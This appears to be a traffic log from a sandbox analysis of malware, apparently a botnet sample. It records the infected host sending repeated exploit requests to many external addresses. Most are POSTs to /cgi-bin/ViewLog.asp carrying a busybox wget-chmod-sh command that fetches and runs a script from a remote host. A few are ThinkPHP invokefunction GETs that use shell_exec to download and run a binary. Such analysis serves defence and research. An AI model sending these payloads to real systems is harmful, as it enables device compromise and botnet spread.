20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20
                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR: 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr /><i><small>Powered by Jetty://</small></i>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        209192.168.2.235682294.120.99.1908080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.402519941 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        210192.168.2.235999694.122.85.1558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.402827978 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        211192.168.2.235332894.120.145.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.402872086 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        212192.168.2.234099094.120.105.128080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:31.402944088 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        213192.168.2.235549831.136.52.768080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.081456900 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.048888922 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:35.968684912 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:39.968269110 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:47.647007942 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:03.004928112 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:35.256489992 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        214192.168.2.235686631.200.5.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.112086058 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        215192.168.2.234102894.112.113.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.399104118 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        216192.168.2.233594894.198.104.488080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.444535017 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        217192.168.2.234065431.200.76.648080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.451958895 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        218192.168.2.233885095.5.37.2348080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.467782021 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        219192.168.2.2343246112.196.10.17780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.509588957 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:33.933098078 CEST124INHTTP/1.0 400 Bad Request
                                                        Server: JAL50_MSC_5
                                                        Date: sun, 14 apr 2024 20:05:31 GMT
                                                        Content-Length: 0
                                                        Connection: Close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        220192.168.2.233789085.31.86.1108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.683686972 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.579998970 CEST614INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Sun, 14 Apr 2024 14:35:33 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        221192.168.2.235331495.131.77.638080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.747601986 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.096340895 CEST224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        222192.168.2.235220494.43.222.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:33.766099930 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.136718035 CEST259INHTTP/1.1 501 Not Implemented
                                                        Connection: Keep-Alive
                                                        Content-Length: 121
                                                        Date: Sun, 14 Apr 2024 14:35:29 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        223192.168.2.236069295.44.251.638080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:34.406239033 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.711112022 CEST533INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:44:55 GMT
                                                        Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1h
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Length: 196
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        224192.168.2.234148295.101.219.18980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:35.252841949 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:35.568005085 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:35 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:35 GMT
                                                        Connection: close
